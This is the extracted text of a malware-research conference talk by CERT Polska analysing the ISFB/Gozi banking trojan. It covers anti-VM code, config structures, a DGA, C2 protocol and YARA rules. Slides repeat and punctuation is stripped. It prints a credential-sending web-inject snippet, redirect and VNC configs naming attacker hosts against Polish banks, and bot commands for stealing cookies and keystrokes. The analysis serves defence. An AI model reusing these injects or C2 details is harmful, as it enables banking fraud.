5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 358
$ whois makMaciej Kotowicz
Principal Malware Researcher CERTplDragonSector CTFREExploit devAutomatization Formal methodsmaciekkotowicz
middotmiddotmiddotmiddotmiddot
358
02122016 ISFB
httpslokalhostpltalksbotconf20161 458
Disclaimer
Based on proposed plan author did some source codeanalysis and want to summarize his
Well Nope 75 of this came from Reverse Engineering
458
ISFB long story short
02122016 ISFB
httpslokalhostpltalksbotconf20161 558
ISFB long story short
Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings
middotmiddotmiddotmiddotmiddotmiddotmiddot
558
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 458
Disclaimer
Based on proposed plan author did some source codeanalysis and want to summarize his
Well Nope 75 of this came from Reverse Engineering
458
ISFB long story short
02122016 ISFB
httpslokalhostpltalksbotconf20161 558
ISFB long story short
Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings
middotmiddotmiddotmiddotmiddotmiddotmiddot
558
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
